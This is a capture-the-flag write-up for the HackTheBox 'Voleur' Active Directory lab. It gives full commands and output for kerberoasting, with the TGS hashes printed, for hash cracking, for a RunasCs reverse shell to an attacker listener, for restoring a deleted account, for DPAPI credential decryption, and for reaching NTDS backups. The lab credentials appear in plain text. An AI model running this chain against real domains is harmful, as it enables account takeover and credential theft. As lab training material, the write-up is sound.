HTB Machine : Voleur
Voleur is a medium level Active Directory Hackthebox machine which is based on the assumed breach scenario (means we have valid credentials).This focusses on kerberos authentication, realm fixation, hash cracking, Bloodhound enumeration, kerberoasting, RunasCs.exe for switching users, extracting DPAPI Vault credentials, recovering deleted AD Objects, lateral movement through users, SSH into WSL and finally using secretsdump to extract secrets from the backups to obtain administrator access.
HTB Machine : Voleur
Initial Enumeration
We are gonna start off with the nmap to find the open ports and services running on the box.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# Nmap 7.95 scan initiated Mon Jul 7 21:48:45 2025 as: /usr/lib/nmap/nmap --privileged -sV -sC -oN voleur.nmap 10.10.11.76
Nmap scan report for 10.10.11.76
Host is up (0.057s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-08 03:49:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-08T03:49:09
|_ start_date: N/A
|_clock-skew: 7h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 7 21:49:54 2025 -- 1 IP address (1 host up) scanned in 69.14 seconds
config
add doamins to
/etc/hosts:
configure the
/etc/krb5.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ python3 /opt/configure_krb5.py voleur.htb dc
[*] This script must be run as root
[*] Configuration Data:
[libdefault]
default_realm = VOLEUR.HTB
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
admin_server = dc.voleur.htb
}
[domain_realm]
voleur.htb = VOLEUR.HTB
.voleur.htb = VOLEUR.HTB
[!] Above Configuration will overwrite /etc/krb5.conf, are you sure? [y/N] y
[+] /etc/krb5.conf has been configured
test the configuration
Everything is ready now to get the flag !!
SMB Enumeration
I tried to enumerate smb shares
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
let’s check
ITshare
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" python3 /opt/venv/bin/smbclient.py -k DC.VOLEUR.HTB
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use IT
# ls
drw-rw-rw- 0 Wed Jan 29 10:10:01 2025 .
drw-rw-rw- 0 Tue Jul 8 06:01:08 2025 ..
drw-rw-rw- 0 Wed Jan 29 10:40:17 2025 First-Line Support
# cd First-Line Support
# ls
drw-rw-rw- 0 Wed Jan 29 10:40:17 2025 .
drw-rw-rw- 0 Wed Jan 29 10:10:01 2025 ..
-rw-rw-rw- 16896 Fri May 30 00:23:36 2025 Access_Review.xlsx
# get Access_Review.xlsx
i load this Access_Review.xlsx file on my host. And it is password protected.
Cracking
i use office2john to obtain a hash JTR format.
Opening the Access_review.xlsx with the above password, displays the following data.
I tried testing these both accounts to enumerate
1
2
3
4
5
6
7
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" nxc smb dc.voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" nxc smb dc.voleur.htb -u 'svc_iis' -p 'N5pXyW1VqM7CZ8' -k
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8
bloodhound
1
2
3
4
5
6
7
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" nxc ldap dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --bloodhound -c All --dns-server 10.10.11.76
LDAP dc.voleur.htb 389 DC.voleur.htb [*] x64 (name:DC.voleur.htb) (domain:voleur.htb) (signing:True) (SMBv1:False)
LDAP dc.voleur.htb 389 DC.voleur.htb [+] voleur.htb\ryan.naylor:HollowOct31Nyt
LDAP dc.voleur.htb 389 DC.voleur.htb Resolved collection methods: trusts, acl, dcom, psremote, group, session, localadmin, objectprops, rdp, container
LDAP dc.voleur.htb 389 DC.voleur.htb Using kerberos auth without ccache, getting TGT
LDAP dc.voleur.htb 389 DC.voleur.htb Done in 00M 07S
LDAP dc.voleur.htb 389 DC.voleur.htb Compressing output into /home/zenon/.nxc/logs/DC.voleur.htb_dc.voleur.htb_2025-07-08_055748_bloodhound.zip
Looking at the Shortest Path from Owned Principals.
SVC_LDAP → SVC_WINRM
User
svc_ldaphas WriteSPN permissions onsvc_winrmmeans we can add a fake SPN to the svc_winrm such as “HTTP/fakehost” means we can kerberoast it. Then we can request a TGS for the same account, and since the TGS is encrypted using the Alfred’s NTLM hash we can crack it offline.
kerberoasting
1
2
3
4
5
6
7
$ faketime "$( ntpdate -q 10.10.11.76 | awk '/^[0-9]/ { print $1" "$2; exit }')" /opt/targetedKerberoast/targetedKerberoast.py --dc-host dc.voleur.htb -d 'voleur.htb' -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$6e82e01b7fa1b31e024444fd117d3a4d$85d68f1c1bd6a06c76aeac6ad42aed5af6d3b6c16e2b7a6b2ff7592f5314749b489daa64ec843148af674cfbf4946d972c2e3fa776f7b5409e8cd679a342e1520862a6ea96d47417db4e76d7fd1f3825c74946b66eb5c45531e89c15fd7a269807fb011369ae11ce112815c057727b6bdadd2f2273999e3964e80b5a14cad0855edfd4784ac0e7de4844c7ae87846943441df3d07c28891d8025515029583c925e70651cce4d8326d24370adf8215561d1db79b758257ab4d1ef4b01c23bbb1871a2a307a8d1b4c4f920e23eb426c0f86912d9d3689217a335198d454152cca03ae50cd75c311049cb7857159ba4228a3286e59b559b95b2e3985016fc2d644b2d681f037a4c1f0a479fabee024ef7788b3afcb5d34f0821bfdb831440c84bcf192d66d653b5095e1cdba405d5a57d35ab2572f30bbb6ebd120b6d03d341877c2bf514c9f9b3850631d913732e9bfff84192565a77bc54bec3fe5a53f416c3dec776d7edf358a7de70dc15dd434773164639ed37a2bdff016a675cc24f4ce911fe9d98bdd1bb7885b70db8fc141e1e36e07fe49a95aaa78995ae69139aec7205aebb83e9d82707ec1e28490f7448fd98b93717b86d35dfe331979813caf8757ab8010935b3ba4eff5f1ae734cada39d31dc11085a9ab49402c54654fb0d6ff42d4a7fa7b4ebc5b85088481dfee6c16018fc3883bb4f758a98a6a439c52acac372708350734f94739b2de6ba3b4a336076b92b087e806299965738752964d27ffa08d6a145cc682110b8f17c508007e825fb76035bf846a004706105f8505a260c2bb30512a7cdb4a426d8c2e9529883a35d53206cc77600e517a6b379917043f9acd23e8c9ba4c3188d27e68faba1b880589bac4086acbaab5fc6ca4cf31bcd29f717cca2afd46b5743ea15b0d220a254b70ac34e5ffdda245d64636ea743c28df7195badccae6d4b2928316b4123d6167e778d50ed86a5b79021476de5573053a296f2c58d1eb7584553d0f150e936d0e72c324a01f67f3ed167b7e4ca658eeaf8cecdb6b2f174e47fcc21df691ba9bda7295ff211265be6e40428990673fbd9c72b139bcb0fa5c22764e3491152d8706d8f22719dd4eb52c6c01d997e1d8348aa835728d13800230f1dc62970c419cb4e03145c230f9f9daad1adf453ec16e57f55c2d4ed76e6963c4a34c6bff84999576d755234e93e19fd9224fbe4e80bfd7831b1510868be15132b2d27348b87b00814379d38700f9c7870ed15986cc5439d8f33827e0447cdfbf6c04d2e27870a7ef3748ea8952984323f25777a408829397977791504a6fcbde1db963531573da5a7a78ffba157b379263aed8a945842d57dfe1f88f3444e0fe9567145a8a4d712ded70dfe42d82b469c79751e4da0b9347a2f4bd965aded25072cf0d278b109a1d1600105ba4ecd47b1f7b881671dc0db3ccd53dc6f163df914a82c686570b2fa1d1
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$9449bba4ab5e81197e7fa7f7387a033f$e76ad0122a910e9be9d101d4e07127835e21d90d427639689d0e838e42a988510ab450b00ba47f0acbadd8a5cb89f5594eababad0e3d338308bdda946dffd36c044ca71c5368dbfc6f7f74f3663f85448b5bebb165d2a19cd75a5542c5da7d53b7ec58beb423173d45a7f86193172078c5f5d5208f507922aa037ee833dc126e4c07c3efd597530421d3e5c9fcceaa3805f6ac77e3ac53f05f023b39f2e57bacb1c6f5d527b1a8540fbf12fdf28f6643a54eedad4623e1feb6884d8fa46f428a2ff07596b8685f57a7c007fd72765f1c5ba4ff00a7b0a89468bb2536dd2303a88cffcfcc6dfe9869117215eefb67266b70c5881cbc504473a0f31d18a412b53f1b5e51e01ecd581ac153e79fe41959733f3137ca885f22d2a24edc3f3148bc6f7d9f001b0cd27f6b4b44c2ca5aee7b07b983820d525fcbf5b3e6021de666398ee15895674e37a20bf6ac92ca8d8fc037c17f83e30b833e01998323e54e6eea84b2118b0d09b669d69c403ae048792961b0f699555695f5381ba1ead5b6fe366f969b72b6b170c466e1d01165e2a846f472d236e64ffcebb0a77e9de3d1c4442f70d274d6305b4a8657f13684268b7b15ca4d8532b1c3bd5f1d6747dc1ac87db69f22a3234051764051ade52e765e895babe240e750da6f298d39745ad0b5f08694dbeb57f375fae8fb224a2bd480abff7c9ad7bb8ea39478abe569efc38db61884489e1120e850d1bbefcef8fd2b26fd87f8864bfe48883959620db80b6e23871d8fda04ad94beafd72b494a5b32317e341fbc4cb58832cb3364407716bc854cc8089b7d20f770c08650e04f86803e2a8584df72b73ea450a2c4dcb54f51b7982ae51a0e032a9426b31cb2f0ebe66da06a332a01e7fb250cf31965ebf95ab6c27626890e6228007f05ddf0fec3a369cf721257ce4206db2d19c4b6c5d0328382001fee9cee06454878c2de61c691775e354a6f821554d3179c085cddba203fbb54101e68874a1ae67f8a1a1de9993b9f60acb506782ad530027fbf7901027d9b435c9647b7ba1c9bfbdc3421052cc415ef09caa255a6a912cc7814d07a7a881705f2b96f0802fd1a835f64d3fa96d670dedc450e380d8ea391ec42f499329f82b3fdfc0df6530bb300d80d1d8e82f76f88a38be5b000b485b6941feae1dfd5d181a621f80f2e63d1429b4f750321ed0c3dae468adf056656ce285e0f2d5e5abcf3ae133327c34db9616e9d4678b5027306a3bb8a5a838ede4b209bbde46dda4a5efecfbb68c593737f665d44ee4bb8812215be7bbb1061a5e4b8edb29fc1f8c9d74d934552e46e067f7b5b5cb4a9d5758789191b8f06999e2aedfd02a7d3c46f786dc2fcbbd6fae29b418439277f1217d3af1a9b5ddb5adfcdb4bf8573eaa99cce6778aa72d441f02805e5a8d48ef9033f64f44b6a7e2b8444c95af3cc792c8471be03172be01de315e4987a163038ce8a2795
Cracking
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ hashcat -m 13100 -a 0 hashes.txt /opt/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 5500U with Radeon Graphics, 1250/2565 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$9449bba4ab5e81197e7fa7f7387a033f$e76ad0122a910e9be9d101d4e07127835e21d90d427639689d0e838e42a988510ab450b00ba47f0acbadd8a5cb89f5594eababad0e3d338308bdda946dffd36c044ca71c5368dbfc6f7f74f3663f85448b5bebb165d2a19cd75a5542c5da7d53b7ec58beb423173d45a7f86193172078c5f5d5208f507922aa037ee833dc126e4c07c3efd597530421d3e5c9fcceaa3805f6ac77e3ac53f05f023b39f2e57bacb1c6f5d527b1a8540fbf12fdf28f6643a54eedad4623e1feb6884d8fa46f428a2ff07596b8685f57a7c007fd72765f1c5ba4ff00a7b0a89468bb2536dd2303a88cffcfcc6dfe9869117215eefb67266b70c5881cbc504473a0f31d18a412b53f1b5e51e01ecd581ac153e79fe41959733f3137ca885f22d2a24edc3f3148bc6f7d9f001b0cd27f6b4b44c2ca5aee7b07b983820d525fcbf5b3e6021de666398ee15895674e37a20bf6ac92ca8d8fc037c17f83e30b833e01998323e54e6eea84b2118b0d09b669d69c403ae048792961b0f699555695f5381ba1ead5b6fe366f969b72b6b170c466e1d01165e2a846f472d236e64ffcebb0a77e9de3d1c4442f70d274d6305b4a8657f13684268b7b15ca4d8532b1c3bd5f1d6747dc1ac87db69f22a3234051764051ade52e765e895babe240e750da6f298d39745ad0b5f08694dbeb57f375fae8fb224a2bd480abff7c9ad7bb8ea39478abe569efc38db61884489e1120e850d1bbefcef8fd2b26fd87f8864bfe48883959620db80b6e23871d8fda04ad94beafd72b494a5b32317e341fbc4cb58832cb3364407716bc854cc8089b7d20f770c08650e04f86803e2a8584df72b73ea450a2c4dcb54f51b7982ae51a0e032a9426b31cb2f0ebe66da06a332a01e7fb250cf31965ebf95ab6c27626890e6228007f05ddf0fec3a369cf721257ce4206db2d19c4b6c5d0328382001fee9cee06454878c2de61c691775e354a6f821554d3179c085cddba203fbb54101e68874a1ae67f8a1a1de9993b9f60acb506782ad530027fbf7901027d9b435c9647b7ba1c9bfbdc3421052cc415ef09caa255a6a912cc7814d07a7a881705f2b96f0802fd1a835f64d3fa96d670dedc450e380d8ea391ec42f499329f82b3fdfc0df6530bb300d80d1d8e82f76f88a38be5b000b485b6941feae1dfd5d181a621f80f2e63d1429b4f750321ed0c3dae468adf056656ce285e0f2d5e5abcf3ae133327c34db9616e9d4678b5027306a3bb8a5a838ede4b209bbde46dda4a5efecfbb68c593737f665d44ee4bb8812215be7bbb1061a5e4b8edb29fc1f8c9d74d934552e46e067f7b5b5cb4a9d5758789191b8f06999e2aedfd02a7d3c46f786dc2fcbbd6fae29b418439277f1217d3af1a9b5ddb5adfcdb4bf8573eaa99cce6778aa72d441f02805e5a8d48ef9033f64f44b6a7e2b8444c95af3cc792c8471be03172be01de315e4987a163038ce8a2795:AFireInsidedeOzarctica980219afi
Approaching final keyspace - workload adjusted.
Guess.Base.......: File (/opt/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
#### Now again we request a TGT for the svc_winrm user, to login with Evil-winrm.
1
2
3
4
impacket-getTGT 'voleur.htb'/'svc_winrm':'AFireInsidedeOzarctica980219afi' -dc-ip 10.10.11.76
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_winrm.ccache
Grabbing that user flag and submitting it.
1
2
3
4
5
$ export KRB5CCNAME=svc_winrm.ccache
$ evil-winrm -i dc.voleur.htb -r voleur.htb -u 'svc_winrm'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\desktop> type user.txt
Privilege Escalation
I enumerated the machine with user svc_winrm but didn’t find anything useful. I also enumerated the deleted objects but didn’t find anything, so I used RunasCs to get a shell as svc_ldap user.
::: Uploaded the binary to our remote machine and set up a listener on our local machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\tmp> upload RunasCs.exe
Info: Uploading /home/zenon/HTB/machines/Voleur/RunasCs.exe to C:\tmp\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\tmp> .\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.14.219:4444
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-48c735$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2556 created in background.
*Evil-WinRM* PS C:\tmp>
I got the shell
1
2
3
4
5
6
7
$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.219] from (UNKNOWN) [10.10.11.76] 56492
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
After trying many things and enumerations methods, I check the deleted objects and found our user Todd.Wolfe.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
PS C:\Windows\system32> Get-ADObject -Filter 'objectClass -eq "user"' -IncludeDeletedObjects -Properties * | Where-Object { $_.isDeleted -eq $true }
Get-ADObject -Filter 'objectClass -eq "user"' -IncludeDeletedObjects -Properties * | Where-Object { $_.isDeleted -eq $true }
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : voleur.htb/Deleted Objects/Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
CN : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
codePage : 0
countryCode : 0
Created : 1/29/2025 1:08:06 AM
createTimeStamp : 1/29/2025 1:08:06 AM
Deleted : True
Description : Second-Line Support Technician
DisplayName : Todd Wolfe
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted
Objects,DC=voleur,DC=htb
dSCorePropagationData : {7/7/2025 9:04:46 PM, 5/13/2025 4:11:10 PM, 1/29/2025 4:52:29 AM, 1/29/2025 4:49:29
AM...}
givenName : Todd
instanceType : 4
isDeleted : True
LastKnownParent : OU=Second-Line Support Technicians,DC=voleur,DC=htb
lastLogoff : 0
lastLogon : 133964213777352642
lastLogonTimestamp : 133964212155008975
logonCount : 7
memberOf : {CN=Second-Line Technicians,DC=voleur,DC=htb, CN=Remote Management
Users,CN=Builtin,DC=voleur,DC=htb}
Modified : 7/7/2025 9:14:48 PM
modifyTimeStamp : 7/7/2025 9:14:48 PM
msDS-LastKnownRDN : Todd Wolfe
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid : S-1-5-21-3927696377-1337352550-2781715495-1110
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133826280731790960
sAMAccountName : todd.wolfe
sDRightsEffective : 0
sn : Wolfe
userAccountControl : 66048
userPrincipalName : todd.wolfe@voleur.htb
uSNChanged : 237902
uSNCreated : 12863
whenChanged : 7/7/2025 9:14:48 PM
whenCreated : 1/29/2025 1:08:06 AM
Now lets recover this user.
1
2
3
4
5
6
7
8
9
10
11
PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db
PS C:\Windows\system32> net user /domain
net user /domain
User accounts for \\DC
-------------------------------------------------------------------------------
Administrator krbtgt svc_ldap
todd.wolfe
The command completed successfully.
We successfully recovered Todd.Wolfe back.
This user is a part of Second-Line Technicia and Domain Users group.
Now previously in the xlsx file we found the credentials for the Todd.Wolfe user we can check its authentication.
request a ccache certidicate and enumeratesa gain SMB shres
DPAPI mining
Downloading the DPAPI Master Key and the Credential file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
$ python3 /opt/venv/bin/smbclient.py -k DC.VOLEUR.HTB
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
# cd /
[-] No share selected
# shares
ADMIN$
C$
Finance
HR
IPC$
IT
NETLOGON
SYSVOL
# cd IT
[-] No share selected
# use IT
# ls
drw-rw-rw- 0 Wed Jan 29 10:10:01 2025 .
drw-rw-rw- 0 Tue Jul 8 07:48:52 2025 ..
drw-rw-rw- 0 Wed Jan 29 16:13:03 2025 Second-Line Support
# cd Second-Line Support
# ls
drw-rw-rw- 0 Wed Jan 29 16:13:03 2025 .
drw-rw-rw- 0 Wed Jan 29 10:10:01 2025 ..
drw-rw-rw- 0 Wed Jan 29 16:13:06 2025 Archived Users
# cd Archived Users
# ls
drw-rw-rw- 0 Wed Jan 29 16:13:06 2025 .
drw-rw-rw- 0 Wed Jan 29 16:13:03 2025 ..
drw-rw-rw- 0 Wed Jan 29 16:13:16 2025 todd.wolfe
# cd todd.wolfe
# ls
drw-rw-rw- 0 Wed Jan 29 16:13:16 2025 .
drw-rw-rw- 0 Wed Jan 29 16:13:06 2025 ..
drw-rw-rw- 0 Wed Jan 29 16:13:06 2025 3D Objects
drw-rw-rw- 0 Wed Jan 29 16:13:09 2025 AppData
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Contacts
drw-rw-rw- 0 Thu Jan 30 15:28:50 2025 Desktop
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Documents
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Downloads
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Favorites
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Links
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Music
-rw-rw-rw- 65536 Wed Jan 29 16:13:06 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TM.blf
-rw-rw-rw- 524288 Wed Jan 29 13:53:07 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000001.regtrans-ms
-rw-rw-rw- 524288 Wed Jan 29 13:53:07 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000002.regtrans-ms
-rw-rw-rw- 20 Wed Jan 29 13:53:07 2025 ntuser.ini
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Pictures
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Saved Games
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Searches
drw-rw-rw- 0 Wed Jan 29 16:13:10 2025 Videos
# cd AppData
# ls
drw-rw-rw- 0 Wed Jan 29 16:13:09 2025 .
drw-rw-rw- 0 Wed Jan 29 16:13:16 2025 ..
drw-rw-rw- 0 Wed Jan 29 16:13:09 2025 Local
drw-rw-rw- 0 Wed Jan 29 16:13:09 2025 LocalLow
drw-rw-rw- 0 Wed Jan 29 16:13:09 2025 Roaming
# mget Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3
[*] Downloading 772275FAD58525253490A9B0039791D3
# mget Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88
[*] Downloading 08949382-134f-4c63-b93c-ce52efc0aa88
#
So we now have Masterkey, Credential file. using impacket’s DPAPI module to extract secrets from it,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
$ impacket-dpapi credential -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 -file 772275FAD58525253490A9B0039791D3
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
This gives us the clear text credentials of the jeremy.combs user.
Using Jeremy’s TGT to get their smb shares.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ python3 /opt/venv/bin/smbclient.py -k DC.VOLEUR.HTB
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use IT
# ls
drw-rw-rw- 0 Wed Jan 29 10:10:01 2025 .
drw-rw-rw- 0 Tue Jul 8 07:48:52 2025 ..
drw-rw-rw- 0 Thu Jan 30 17:11:29 2025 Third-Line Support
# cd Third-Line Support
# ls
drw-rw-rw- 0 Thu Jan 30 17:11:29 2025 .
drw-rw-rw- 0 Wed Jan 29 10:10:01 2025 ..
-rw-rw-rw- 2602 Thu Jan 30 17:11:29 2025 id_rsa
-rw-rw-rw- 186 Thu Jan 30 17:07:35 2025 Note.txt.txt
# get id_rsa
# get Note.txt.txt
we found ssh private key and a note
1
2
3
4
5
6
7
8
9
10
$ cat Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
SSH connection
After reading Note.txt.txt and downloading id_rsa, Here I enumerated a lot but did not find anything useful.
I gone through all the users on the box, there is one named svc_backup. Also earlier we noticed in the nmap output that port 2222 is running open ssh server. And since we have id_rsa, I tried sshing to the box with svc_backup user.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ ssh svc_backup@10.10.11.76 -i id_rsa -p 2222
svc_backup@DC:~$ ls
svc_backup@DC:~$ whoami
svc_backup
svc_backup@DC:~$ ls /mnt/c/
$Recycle.Bin/ DumpStack.log.tmp IT/ Program Files (x86)/ System Volume Information/ inetpub/
$WinREAgent/ Finance/ PerfLogs/ ProgramData/ Users/ pagefile.sys
Documents and Settings/ HR/ Program Files/ Recovery/ Windows/ tmp/
svc_backup@DC:~$ ls /mnt/c/IT/
First-Line Support/ Second-Line Support/ Third-Line Support/
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/
Backups/ Note.txt.txt id_rsa
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/
Active Directory/ registry/
svc_backup@DC:~$ ls /mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/
ntds.dit ntds.jfm
